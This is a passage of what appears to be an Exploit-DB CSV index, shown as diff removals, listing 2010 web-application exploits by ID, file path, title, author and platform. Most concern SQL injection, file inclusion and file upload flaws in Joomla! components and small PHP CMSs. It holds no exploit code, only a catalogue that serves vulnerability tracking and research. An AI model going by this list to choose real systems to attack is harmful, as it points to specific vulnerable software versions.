-12236,exploits/php/webapps/12236.txt,"Joomla! Component JA Comment - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps, -12237,exploits/php/webapps/12237.txt,"Joomla! Component Delicious Bookmarks 0.0.1 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps, -12238,exploits/php/webapps/12238.txt,"Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps, -12239,exploits/php/webapps/12239.txt,"Joomla! Component BeeHeard 1.0 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps, -12241,exploits/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps, -12242,exploits/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System - Multiple SQL Injections",2010-04-14,wsn1983,jsp,webapps, -12245,exploits/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script - buyers_subcategories SQL Injection",2010-04-15,"AnGrY BoY",php,webapps, -12246,exploits/php/webapps/12246.txt,"Joomla! Component Intellectual Property 1.5.3 - 'id' SQL Injection",2010-04-15,v3n0m,php,webapps, -12249,exploits/php/webapps/12249.txt,"60cycleCMS 2.5.2 - 'DOCUMENT_ROOT' Multiple Local File Inclusions",2010-04-15,eidelweiss,php,webapps, -12251,exploits/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - 'FCKeditor' Arbitrary File Upload",2010-04-15,eidelweiss,php,webapps, -12254,exploits/php/webapps/12254.txt,"FCKEditor Core - 'FileManager test.html' Arbitrary File Upload (1)",2010-04-16,Mr.MLL,php,webapps, -12256,exploits/php/webapps/12256.txt,"ilchClan 1.0.5B - SQL Injection",2010-04-16,"Easy Laster",php,webapps, -12257,exploits/php/webapps/12257.txt,"Joomla! Component com_manager 1.5.3 - 'id' SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps, -12260,exploits/php/webapps/12260.txt,"SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting",2010-04-16,JosS,php,webapps, -12262,exploits/php/webapps/12262.php,"Zyke CMS 1.1 - Authentication Bypass",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps, -12266,exploits/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change Username and Password)",2010-04-16,EL-KAHINA,php,webapps, -12267,exploits/php/webapps/12267.txt,"WebAdmin - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps, -12268,exploits/php/webapps/12268.txt,"Uploader 0.7 - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps, -12269,exploits/php/webapps/12269.txt,"Joomla! Component JoltCard 1.2.1 - SQL Injection",2010-04-16,Valentin,php,webapps, -12270,exploits/php/webapps/12270.txt,"Joomla! Component com_pandafminigames - SQL Injection",2010-04-16,Valentin,php,webapps, -12272,exploits/php/webapps/12272.txt,"PHP RapidKill Pro 5.x - Arbitrary File Upload",2010-04-17,DigitALL,php,webapps, -12276,exploits/php/webapps/12276.txt,"Redaxo 4.2.1 - Remote File Inclusion",2010-04-18,eidelweiss,php,webapps, -12277,exploits/php/webapps/12277.txt,"Openscrutin 1.03 - Local File Inclusion / Remote File Inclusion",2010-04-18,cr4wl3r,php,webapps, -12278,exploits/php/webapps/12278.txt,"Alegro 1.2.1 - SQL Injection",2010-04-18,indoushka,php,webapps, -12279,exploits/php/webapps/12279.txt,"eclime 1.1 - Bypass / Create and Download Backup",2010-04-18,indoushka,php,webapps, -12280,exploits/php/webapps/12280.txt,"dl_stats - Multiple Vulnerabilities",2010-04-18,"Valentin Hoebel",php,webapps, -12282,exploits/php/webapps/12282.txt,"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion",2010-04-18,"wishnusakti + inc0mp13te",php,webapps, -12283,exploits/php/webapps/12283.txt,"Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps, -12284,exploits/php/webapps/12284.txt,"Joomla! Component ZiMBCore 0.1 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps, -12285,exploits/php/webapps/12285.txt,"Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps, -12286,exploits/php/webapps/12286.txt,"Joomla! Component Matamko 1.01 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps, -12287,exploits/php/webapps/12287.txt,"Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps, -12288,exploits/php/webapps/12288.txt,"Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps, -12289,exploits/php/webapps/12289.txt,"Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps, -12290,exploits/php/webapps/12290.txt,"Joomla! Component com_google - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps, -12291,exploits/php/webapps/12291.txt,"Joomla! Component iF surfALERT 1.2 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps, -12292,exploits/php/webapps/12292.txt,"Flex File Manager - Arbitrary File Upload",2010-04-19,Mr.MLL,php,webapps, -12295,exploits/php/webapps/12295.txt,"N/X Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities",2010-04-19,eidelweiss,php,webapps, -12296,exploits/php/webapps/12296.txt,"Openreglement 1.04 - Local File Inclusion / Remote File Inclusion",2010-04-19,cr4wl3r,php,webapps, -12299,exploits/php/webapps/12299.txt,"Joomla! Component GBU Facebook 1.0.5 - SQL Injection",2010-04-19,kaMtiEz,php,webapps, -12301,exploits/php/webapps/12301.txt,"CMS Ariadna 2009 - SQL Injection",2010-04-19,"Andrés Gómez",php,webapps, -12303,exploits/php/webapps/12303.pl,"MusicBox 3.3 - SQL Injection",2010-04-20,Ctacok,php,webapps, -12305,exploits/php/webapps/12305.txt,"Joomla! Component Online News Paper Manager 1.0 - 'cid' SQL Injection",2010-04-20,"Don Tukulesto",php,webapps, -12306,exploits/php/webapps/12306.txt,"Joomla! Component JTM Reseller 1.9 Beta - SQL Injection",2010-04-20,kaMtiEz,php,webapps, -12313,exploits/php/webapps/12313.txt,"Openregistrecil 1.02 - Local File Inclusion / Remote File Inclusion",2010-04-20,cr4wl3r,php,webapps, -12315,exploits/php/webapps/12315.txt,"v2marketplacescript Upload_images Script (-7777) - Arbitrary File Upload",2010-04-21,cyberlog,php,webapps, -12316,exploits/php/webapps/12316.txt,"Joomla! Component WMI 1.5.0 - Local File Inclusion",2010-04-21,"wishnusakti + inc0mp13te",php,webapps, -12317,exploits/php/webapps/12317.txt,"Joomla! Component OrgChart 1.0.0 - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps, -12318,exploits/php/webapps/12318.txt,"Joomla! Component MMS Blog 2.3.0 - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps, -12319,exploits/php/webapps/12319.txt,"e107 CMS 0.7.19 - Cross-Site Request Forgery",2010-04-21,"High-Tech Bridge SA",php,webapps, -12322,exploits/php/webapps/12322.txt,"LightNEasy 3.1.x - Multiple Vulnerabilities",2010-04-21,ITSecTeam,php,webapps, -12323,exploits/php/webapps/12323.txt,"wb news (webmobo) 2.3.3 - Persistent Cross-Site Scripting",2010-04-21,ITSecTeam,php,webapps, -12325,exploits/php/webapps/12325.txt,"Joomla! Component com_portfolio - Local File Disclosure",2010-04-21,Mr.tro0oqy,php,webapps, -12329,exploits/asp/webapps/12329.txt,"CactuShop - User Invoices Persistent Cross-Site Scripting",2010-04-21,7Safe,asp,webapps, -12330,exploits/php/webapps/12330.txt,"Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities",2010-04-21,"Lucas Apa",php,webapps, -12333,exploits/php/webapps/12333.txt,"cms (id) 5.0 - SQL Injection",2010-04-22,spykit,php,webapps, -12338,exploits/php/webapps/12338.txt,"Cacti 0.8.7e - SQL Injection",2010-04-22,"Nahuel Grisolia",php,webapps, -12339,exploits/php/webapps/12339.txt,"Cacti 0.8.7e - OS Command Injection",2010-04-22,"Nahuel Grisolia",php,webapps, -12345,exploits/php/webapps/12345.txt,"phpGreetCards 3.7 - Cross-Site Scripting",2010-04-22,Valentin,php,webapps, -12346,exploits/php/webapps/12346.txt,"AJ Matrix 3.1 - 'id' Multiple SQL Injections",2010-04-22,v3n0m,php,webapps, -12349,exploits/php/webapps/12349.txt,"AJ Shopping Cart 1.0 (maincatid) - SQL Injection",2010-04-22,v3n0m,php,webapps, -12350,exploits/php/webapps/12350.txt,"In-portal 5.0.3 - Arbitrary File Upload",2010-04-23,eidelweiss,php,webapps, -12351,exploits/php/webapps/12351.txt,"memorial Web site script - 'id' SQL Injection",2010-04-23,v3n0m,php,webapps, -12353,exploits/php/webapps/12353.txt,"EPay Enterprise 4.13 - 'cid' SQL Injection",2010-04-23,v3n0m,php,webapps, -12354,exploits/php/webapps/12354.pl,"NKINFOWEB - SQL Injection",2010-04-23,d4rk-h4ck3r,php,webapps, -12355,exploits/php/webapps/12355.pl,"Excitemedia CMS - SQL Injection",2010-04-23,"Dr.0rYX & Cr3W-DZ",php,webapps, -12358,exploits/php/webapps/12358.txt,"Memorial Web Site Script - Reset Password / Insecure Cookie Handling",2010-04-23,"Chip d3 bi0s",php,webapps, -12359,exploits/php/webapps/12359.txt,"Memorial Web Site Script - Multiple Arbitrary Delete Vulnerabilities",2010-04-23,"Chip d3 bi0s",php,webapps, -12360,exploits/php/webapps/12360.pl,"Template Seller Pro 3.25 - 'tempid' SQL Injection",2010-04-23,v3n0m,php,webapps, -12361,exploits/php/webapps/12361.txt,"lanewsfactory - Multiple Vulnerabilities",2010-04-23,"Salvatore Fresta",php,webapps, -12364,exploits/php/webapps/12364.txt,"Openpresse 1.01 - Local File Inclusion",2010-04-24,cr4wl3r,php,webapps, -12365,exploits/php/webapps/12365.txt,"Openplanning 1.00 - Local File Inclusion / Remote File Inclusion",2010-04-24,cr4wl3r,php,webapps, -12366,exploits/php/webapps/12366.txt,"Openfoncier 2.00 - Local File Inclusion / Remote File Inclusion",2010-04-24,cr4wl3r,php,webapps, -12369,exploits/php/webapps/12369.txt,"Madirish Webmail 2.01 - 'baseDir' Local/Remote File Inclusion",2010-04-24,eidelweiss,php,webapps, -12370,exploits/php/webapps/12370.txt,"NCT Jobs Portal Script - Cross-Site Scripting / Authentication Bypass",2010-04-24,Sid3^effects,php,webapps, -12371,exploits/php/webapps/12371.txt,"WHMCompleteSolution (WHMCS) control (WHMCompleteSolution) - SQL Injection",2010-04-24,"Islam DefenDers",php,webapps, -12372,exploits/php/webapps/12372.txt,"Alstrasoft AskMe Pro 2.1 - 'que_id' SQL Injection",2010-04-24,v3n0m,php,webapps, -12373,exploits/php/webapps/12373.txt,"Sethi Family Guestbook 3.1.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps, -12374,exploits/php/webapps/12374.txt,"G5 Scripts Guestbook PHP 1.2.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps, -12376,exploits/php/webapps/12376.php,"SmodCMS 4.07 (fckeditor) - Arbitrary File Upload",2010-04-24,eidelweiss,php,webapps, -12378,exploits/php/webapps/12378.txt,"CMS Firebrand Tec - Local File Inclusion",2010-04-25,R3VAN_BASTARD,php,webapps, -12381,exploits/php/webapps/12381.php,"phpegasus 0.1.2 - 'FCKeditor' Arbitrary File Upload",2010-04-25,eidelweiss,php,webapps, -12383,exploits/php/webapps/12383.txt,"clipak - Arbitrary File Upload",2010-04-25,indoushka,php,webapps, -12384,exploits/php/webapps/12384.txt,"Powered by iNetScripts - Arbitrary File Upload",2010-04-25,Sec-q8,php,webapps, -12385,exploits/php/webapps/12385.html,"TR Forum 1.5 - Cross-Site Request Forgery (Add Admin)",2010-04-25,EL-KAHINA,php,webapps, -12386,exploits/php/webapps/12386.txt,"PHP Classifieds 6.09 - E-mail Dump",2010-04-25,indoushka,php,webapps, -12387,exploits/php/webapps/12387.sh,"webessence 1.0.2 - Multiple Vulnerabilities",2010-04-25,r00t,php,webapps, -12395,exploits/php/webapps/12395.txt,"2DayBiz Advanced Poll Script - Cross-Site Scripting / Authentication Bypass",2010-04-26,Sid3^effects,php,webapps, -12396,exploits/php/webapps/12396.txt,"OpenCominterne 1.01 - Local File Inclusion",2010-04-26,cr4wl3r,php,webapps, -12398,exploits/php/webapps/12398.txt,"Opencourrier 2.03beta - Local File Inclusion / Remote File Inclusion",2010-04-26,cr4wl3r,php,webapps, -12399,exploits/php/webapps/12399.txt,"Uiga Personal Portal - 'index.php' 'view' SQL Injection",2010-04-26,41.w4r10r,php,webapps, -12400,exploits/php/webapps/12400.txt,"Joomla! Component JoomRadio 1.0 - SQL Injection",2010-04-26,Mr.tro0oqy,php,webapps, -12402,exploits/php/webapps/12402.txt,"Kasseler CMS 2.0.5 - Bypass / Download Backup",2010-04-26,indoushka,php,webapps, -12407,exploits/php/webapps/12407.txt,"CMScout 2.08 - SQL Injection",2010-04-26,"Dr.0rYX & Cr3W-DZ",php,webapps, -12410,exploits/php/webapps/12410.txt,"PostNuke 0.764 Module modload - SQL Injection",2010-04-26,BILGE_KAGAN,php,webapps, -12411,exploits/php/webapps/12411.txt,"FreeRealty(Free Real Estate Listing Software) - Authentication Bypass",2010-04-27,Sid3^effects,php,webapps, -12412,exploits/php/webapps/12412.txt,"Ramaas Software CMS - SQL Injection",2010-04-27,41.w4r10r,php,webapps, -12413,exploits/php/webapps/12413.txt,"i-Net Online Community - Cross-Site Scripting / Authentication Bypass",2010-04-27,Sid3^effects,php,webapps, -12414,exploits/php/webapps/12414.txt,"2DayBiz Auction Script - Authentication Bypass",2010-04-27,Sid3^effects,php,webapps, -12415,exploits/php/webapps/12415.txt,"Infocus Real Estate Enterprise Edition Script - Authentication Bypass",2010-04-27,Sid3^effects,php,webapps, -12416,exploits/php/webapps/12416.txt,"PHP Quick Arcade 3.0.21 - Multiple Vulnerabilities",2010-04-27,ITSecTeam,php,webapps, -12419,exploits/php/webapps/12419.txt,"Boutique SudBox 1.2 - Cross-Site Request Forgery (Changer Login et Mot de Passe)",2010-04-27,indoushka,php,webapps, -12420,exploits/php/webapps/12420.php,"Portaneo Portal 2.2.3 - Arbitrary File Upload",2010-04-27,eidelweiss,php,webapps, -12421,exploits/php/webapps/12421.txt,"Help Center Live 2.0.6 - 'module=helpcenter&file=' Local File Inclusion",2010-04-27,41.w4r10r,php,webapps, -12423,exploits/php/webapps/12423.txt,"CLScript.com Classifieds Software - SQL Injection",2010-04-27,41.w4r10,php,webapps, -12424,exploits/asp/webapps/12424.txt,"Acart 2.0 Shopping Cart - Software Backup Dump",2010-04-27,indoushka,asp,webapps, -12426,exploits/php/webapps/12426.txt,"Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps, -12427,exploits/php/webapps/12427.txt,"Joomla! Component NoticeBoard 1.3 - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps, -12428,exploits/php/webapps/12428.txt,"Joomla! Component SmartSite 1.0.0 - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps, -12429,exploits/php/webapps/12429.pl,"Joomla! Component ABC 1.1.7 - SQL Injection",2010-04-27,AntiSecurity,php,webapps, -12430,exploits/php/webapps/12430.txt,"Joomla! Component Graphics 1.0.6 - Local File Inclusion",2010-04-27,"wishnusakti + inc0mp13te",php,webapps, -12432,exploits/php/webapps/12432.txt,"Joomla! Component com_jesectionfinder - Arbitrary File Upload",2010-04-28,Sid3^effects,php,webapps, -12433,exploits/cgi/webapps/12433.py,"NIBE heat pump - Remote Code Execution",2010-04-28,"Jelmer de Hen",cgi,webapps, -12434,exploits/cgi/webapps/12434.py,"NIBE heat pump - Local File Inclusion",2010-04-28,"Jelmer de Hen",cgi,webapps, -12435,exploits/php/webapps/12435.txt,"Zabbix 1.8.1 - SQL Injection",2010-04-01,"Dawid Golunski",php,webapps, -12436,exploits/php/webapps/12436.txt,"Pligg CMS 1.0.4 - 'story.php' SQL Injection",2010-04-28,"Don Tukulesto",php,webapps, -12438,exploits/php/webapps/12438.txt,"SoftBizScripts Dating Script - SQL Injection",2010-04-28,41.w4r10r,php,webapps, -12439,exploits/php/webapps/12439.txt,"SoftBizScripts Hosting Script - SQL Injection",2010-04-28,41.w4r10r,php,webapps, -12440,exploits/php/webapps/12440.txt,"Joomla! Component Wap4Joomla - 'wapmain.php' SQL Injection",2010-04-28,Manas58,php,webapps, -12441,exploits/php/webapps/12441.html,"gpEasy 1.6.1 - Cross-Site Request Forgery (Add Admin)",2010-04-28,"Giuseppe 'giudinvx' D'Inverno",php,webapps, -12442,exploits/php/webapps/12442.txt,"GeneShop 5.1.1 - SQL Injection",2010-04-28,41.w4r10r,php,webapps, -12443,exploits/php/webapps/12443.txt,"Modelbook - 'casting_view.php' SQL Injection",2010-04-28,v3n0m,php,webapps, -12444,exploits/php/webapps/12444.txt,"PHP Video Battle - SQL Injection",2010-04-28,v3n0m,php,webapps, -12445,exploits/php/webapps/12445.txt,"Articles Directory - Authentication Bypass",2010-04-29,Sid3^effects,php,webapps, -12446,exploits/php/webapps/12446.txt,"TR Forum 1.5 - Multiple Vulnerabilities",2010-04-29,indoushka,php,webapps, -12447,exploits/php/webapps/12447.txt,"XT-Commerce 1.0 Beta 1 - Pass / Create and Download Backup",2010-04-29,indoushka,php,webapps, -12448,exploits/php/webapps/12448.txt,"Socialware 2.2 - Upload / Cross-Site Scripting",2010-04-29,Sid3^effects,php,webapps, -12449,exploits/php/webapps/12449.txt,"DZCP (deV!L_z Clanportal) 1.5.3 - Multiple Vulnerabilities",2010-04-29,indoushka,php,webapps, -12450,exploits/windows/webapps/12450.txt,"Microsoft SharePoint Server 2007 - Cross-Site Scripting",2010-04-29,"High-Tech Bridge SA",windows,webapps, -12451,exploits/php/webapps/12451.txt,"iScripts VisualCaster - SQL Injection",2010-04-29,Sid3^effects,php,webapps, -12452,exploits/php/webapps/12452.txt,"TaskFreak 0.6.2 - SQL Injection",2010-04-29,"Justin C. Klein Keane",php,webapps, -12453,exploits/php/webapps/12453.txt,"Zyke CMS 1.1 - Bypass",2010-04-29,indoushka,php,webapps, -12454,exploits/php/webapps/12454.txt,"Zyke CMS 1.0 - Arbitrary File Upload",2010-04-29,indoushka,php,webapps, -12455,exploits/php/webapps/12455.txt,"Ucenter Projekt 2.0 - Insecure crossdomain (Cross-Site Scripting)",2010-04-29,indoushka,php,webapps, -12456,exploits/php/webapps/12456.txt,"chCounter - indirect SQL Injection / Cross-Site Scripting",2010-04-29,Valentin,php,webapps, -12458,exploits/php/webapps/12458.txt,"Scratcher - SQL Injection / Cross-Site Scripting",2010-04-29,cr4wl3r,php,webapps, -12459,exploits/php/webapps/12459.txt,"ec21 clone 3.0 - 'id' SQL Injection",2010-04-30,v3n0m,php,webapps, -12460,exploits/php/webapps/12460.txt,"B2B Gold Script - 'id' SQL Injection",2010-04-30,v3n0m,php,webapps, -12461,exploits/php/webapps/12461.txt,"JobPost - SQL Injection",2010-04-30,Sid3^effects,php,webapps, -12462,exploits/php/webapps/12462.txt,"AutoDealer 1.0/2.0 - MSSQL Injection",2010-04-30,Sid3^effects,php,webapps, -12463,exploits/php/webapps/12463.txt,"New-CMS - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",php,webapps, -12464,exploits/asp/webapps/12464.txt,"ASPCode CMS 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps, -12465,exploits/php/webapps/12465.txt,"Joomla! Component Newsfeeds - SQL Injection",2010-04-30,Archimonde,php,webapps, -12466,exploits/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion",2010-04-30,eidelweiss,php,webapps, -12467,exploits/php/webapps/12467.txt,"Webthaiapp - 'detail.php?cat' Blind SQL Injection",2010-04-30,Xelenonz,php,webapps, -12468,exploits/php/webapps/12468.txt,"Alibaba Clone Platinum - 'offers_buy.php' SQL Injection",2010-04-30,v3n0m,php,webapps, -12471,exploits/asp/webapps/12471.txt,"Comersus 8 Shopping Cart - SQL Injection / Cross-Site Request Forgery",2010-05-01,Sid3^effects,asp,webapps, -12472,exploits/php/webapps/12472.txt,"CF Image Host 1.1 - Remote File Inclusion",2010-05-01,The.Morpheus,php,webapps, -12473,exploits/php/webapps/12473.txt,"Joomla! Component Table JX - Cross-Site Scripting",2010-05-01,Valentin,php,webapps, -12474,exploits/php/webapps/12474.txt,"Joomla! Component Card View JX - Cross-Site Scripting",2010-05-01,Valentin,php,webapps, -12475,exploits/php/webapps/12475.txt,"Opencatalogue 1.024 - Local File Inclusion",2010-05-01,cr4wl3r,php,webapps, -12476,exploits/php/webapps/12476.txt,"Opencimetiere 2.01 - Multiple Remote File Inclusions",2010-05-01,cr4wl3r,php,webapps, -12478,exploits/asp/webapps/12478.txt,"Mesut Manþet Haber 1.0 - Authentication Bypass",2010-05-02,LionTurk,asp,webapps, -12479,exploits/php/webapps/12479.txt,"Joomla! Component com_djClassifieds 0.9.1 - Arbitrary File Upload",2010-05-02,Sid3^effects,php,webapps, -12481,exploits/php/webapps/12481.txt,"WHMCompleteSolution (WHMCS) Control 2 - 'announcements.php' SQL Injection",2010-05-02,"Islam DefenDers",php,webapps, -12484,exploits/php/webapps/12484.txt,"GuppY 4.5.18 - Blind SQL Injection / XPath Injection",2010-05-02,indoushka,php,webapps, -12485,exploits/php/webapps/12485.txt,"Burning Board Lite 1.0.2 - Arbitrary File Upload",2010-05-02,indoushka,php,webapps, -12486,exploits/php/webapps/12486.txt,"Openannuaire Openmairie Annuaire 2.00 - Local File Inclusion / Remote File Inclusion",2010-05-02,cr4wl3r,php,webapps, -12488,exploits/php/webapps/12488.txt,"Gallo 0.1.0 - Remote File Inclusion",2010-05-03,cr4wl3r,php,webapps, -12489,exploits/php/webapps/12489.txt,"Joomla! 1.6.0 Alpha2 - Cross-Site Scripting",2010-05-03,mega-itec.com,php,webapps, -14025,exploits/php/webapps/14025.txt,"2DayBiz Job Site Script - SQL Injection",2010-06-24,Sangteamtham,php,webapps, -12496,exploits/php/webapps/12496.html,"KubeBlog - Cross-Site Request Forgery",2010-05-03,The.Morpheus,php,webapps, -12499,exploits/php/webapps/12499.txt,"DBHcms 1.1.4 - Persistent Cross-Site Scripting",2010-05-04,ITSecTeam,php,webapps, -12500,exploits/php/webapps/12500.txt,"Clicksor - SQL Injection",2010-05-04,JM511,php,webapps, -12504,exploits/php/webapps/12504.txt,"thEngine 0.1 - Local File Inclusion",2010-05-04,team_elite,php,webapps, -12506,exploits/php/webapps/12506.php,"Knowledgeroot (fckeditor) - Arbitrary File Upload",2010-05-04,eidelweiss,php,webapps, -12507,exploits/php/webapps/12507.txt,"SmartCMS 2 - SQL Injection",2010-05-04,Ariko-Security,php,webapps, -12510,exploits/php/webapps/12510.php,"PHP-Nuke 7.0/8.1/8.1.35 - Wormable Remote Code Execution",2010-05-05,"Michael Brooks",php,webapps, -12514,exploits/php/webapps/12514.txt,"PHP-Nuke 5.0 - Viewslink SQL Injection",2010-05-05,CMD,php,webapps, -12515,exploits/php/webapps/12515.txt,"Slooze PHP Web Photo Album 0.2.7 - Command Execution",2010-05-05,"Sn!pEr.S!Te Hacker",php,webapps, -12517,exploits/php/webapps/12517.txt,"Getsimple 2.01 - Local File Inclusion",2010-05-06,Batch,php,webapps, -12519,exploits/php/webapps/12519.txt,"AV Arcade - 'Search' Cross-Site Scripting / HTML Injection",2010-05-06,"Vadim Toptunov",php,webapps, -12520,exploits/php/webapps/12520.html,"OCS Inventory NG Server 1.3.1 - 'LOGIN' Remote Authentication Bypass",2010-05-06,"Nicolas DEROUET",php,webapps, -12521,exploits/php/webapps/12521.txt,"Factux - Local File Inclusion",2010-05-06,ALTBTA,php,webapps, -12522,exploits/php/webapps/12522.txt,"WeBProdZ CMS - SQL Injection",2010-05-06,MasterGipy,php,webapps, -12523,exploits/php/webapps/12523.txt,"REZERVI 3.0.2 - Remote Command Execution",2010-05-06,"JosS & eidelweiss",php,webapps, -12525,exploits/php/webapps/12525.txt,"PHP-Nuke - 'friend.php' Module SQL Injection",2010-05-07,CMD,php,webapps, -12526,exploits/asp/webapps/12526.txt,"ArticleLive (Interspire Website Publisher) - SQL Injection",2010-05-07,Ra3cH,asp,webapps, -12532,exploits/php/webapps/12532.txt,"B2B Classic Trading Script - 'offers.php' SQL Injection",2010-05-08,v3n0m,php,webapps, -12533,exploits/php/webapps/12533.txt,"big.asp - SQL Injection",2010-05-08,Ra3cH,php,webapps, -12534,exploits/php/webapps/12534.txt,"PHP Link Manager 1.7 - URL Redirection",2010-05-08,ITSecTeam,php,webapps, -12535,exploits/php/webapps/12535.txt,"phpscripte24 Countdown Standart Rückwärts Auktions System - SQL Injection",2010-05-08,"Easy Laster",php,webapps, -12539,exploits/php/webapps/12539.txt,"Joomla! Component Article Factory Manager - Arbitrary File Upload",2010-05-08,Sid3^effects,php,webapps, -12542,exploits/php/webapps/12542.rb,"phpscripte24 Shop System - SQL Injection",2010-05-09,"Easy Laster",php,webapps, -12543,exploits/php/webapps/12543.rb,"Alibaba Clone 3.0 (Special) - SQL Injection",2010-05-09,"Easy Laster",php,webapps, -12544,exploits/php/webapps/12544.rb,"Alibaba Clone Diamond Version - SQL Injection",2010-05-09,"Easy Laster",php,webapps, -12545,exploits/php/webapps/12545.rb,"phpscripte24 Live Shopping Multi Portal System - SQL Injection",2010-05-09,"Easy Laster",php,webapps, -12547,exploits/php/webapps/12547.txt,"e-webtech - 'new.asp?id=' SQL Injection",2010-05-10,protocol,php,webapps, -12550,exploits/php/webapps/12550.pl,"Netvidade engine 1.0 - Multiple Vulnerabilities",2010-05-10,pwndomina,php,webapps, -12551,exploits/php/webapps/12551.txt,"Spaceacre - Multiple SQL Injections",2010-05-10,gendenk,php,webapps, -12552,exploits/php/webapps/12552.txt,"tekno.Portal 0.1b - 'makale.php?id' SQL Injection",2010-05-10,CoBRa_21,php,webapps, -12553,exploits/php/webapps/12553.txt,"Dark Hart Portal - 'login.php' Remote File Inclusion",2010-05-10,CoBRa_21,php,webapps, -12556,exploits/php/webapps/12556.txt,"Tadbir CMS - 'FCKeditor' Arbitrary File Upload",2010-05-10,"Pouya Daneshmand",php,webapps, -12557,exploits/php/webapps/12557.txt,"family connections 2.2.3 - Multiple Vulnerabilities",2010-05-10,"Salvatore Fresta",php,webapps, -12558,exploits/php/webapps/12558.txt,"29o3 CMS - 'LibDir' Multiple Remote File Inclusions",2010-05-10,eidelweiss,php,webapps, -12560,exploits/php/webapps/12560.txt,"724CMS Enterprise 4.59 - SQL Injection",2010-05-10,cyberlog,php,webapps, -12561,exploits/php/webapps/12561.txt,"PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multiple SQL Injections",2010-05-10,R3d-D3V!L,php,webapps, -12562,exploits/php/webapps/12562.txt,"Waibrasil - Local/Remote File Inclusion",2010-05-10,eXeSoul,php,webapps, -12563,exploits/php/webapps/12563.txt,"Fiomental & Coolsis Backoffice - Multiple Vulnerabilities",2010-05-10,MasterGipy,php,webapps, -12565,exploits/php/webapps/12565.txt,"724CMS Enterprise 4.59 - 'section.php' Local File Inclusion",2010-05-11,CoBRa_21,php,webapps, -12566,exploits/php/webapps/12566.txt,"724CMS Enterprise 4.59 - 'section.php' SQL Injection",2010-05-11,CoBRa_21,php,webapps, -12567,exploits/php/webapps/12567.html,"Aqar Script 1.0 - Remote Bypass",2010-05-11,indoushka,php,webapps, -12568,exploits/php/webapps/12568.txt,"Digital College 1.0 - Arbitrary File Upload",2010-05-11,indoushka,php,webapps, -12569,exploits/php/webapps/12569.html,"Fast Free Media 1.3 Adult Site - Arbitrary File Upload",2010-05-11,indoushka,php,webapps, -12570,exploits/php/webapps/12570.txt,"Uploader 0.1.5 - Multiple Vulnerabilities",2010-05-11,indoushka,php,webapps, -12571,exploits/asp/webapps/12571.txt,"e-webtech - 'page.asp' SQL Injection",2010-05-11,CoBRa_21,asp,webapps, -12572,exploits/php/webapps/12572.txt,"Free Advertisment CMS - 'user_info.php' SQL Injection",2010-05-11,XroGuE,php,webapps, -12574,exploits/php/webapps/12574.txt,"Joomla! Component mod_VisitorData 1.1 - Remote code Execution",2010-05-11,"Chip d3 bi0s",php,webapps, -12575,exploits/php/webapps/12575.txt,"Marinet CMS - SQL Injection",2010-05-11,XroGuE,php,webapps, -12576,exploits/php/webapps/12576.txt,"Woodall Creative - SQL Injection",2010-05-11,XroGuE,php,webapps, -12577,exploits/php/webapps/12577.txt,"Marinet CMS - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-11,CoBRa_21,php,webapps, -12579,exploits/php/webapps/12579.txt,"Joomla! Component com_PHP 0.1 - Local File Inclusion",2010-05-12,"Chip d3 bi0s",php,webapps, -12583,exploits/php/webapps/12583.txt,"e-webtech - 'fixed_page.asp' SQL Injection",2010-05-12,FL0RiX,php,webapps, -12584,exploits/php/webapps/12584.txt,"PolyPager 1.0rc10 - 'FCKeditor' Arbitrary File Upload",2010-05-12,eidelweiss,php,webapps, -12585,exploits/php/webapps/12585.txt,"4Images 1.7.7 - 'image_utils.php' Remote Command Execution",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps, -12586,exploits/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection",2010-05-13,Cryptovirus,php,webapps, -12590,exploits/php/webapps/12590.txt,"Joomla! Component Komento 1.0.0 - 'sid' SQL Injection",2010-05-13,c4uR,php,webapps, -12591,exploits/php/webapps/12591.txt,"BlaB! Lite 0.5 - Remote File Inclusion",2010-05-13,"Sn!pEr.S!Te Hacker",php,webapps, -12592,exploits/php/webapps/12592.txt,"Joomla! Component aardvertiser 2.0 - Local File 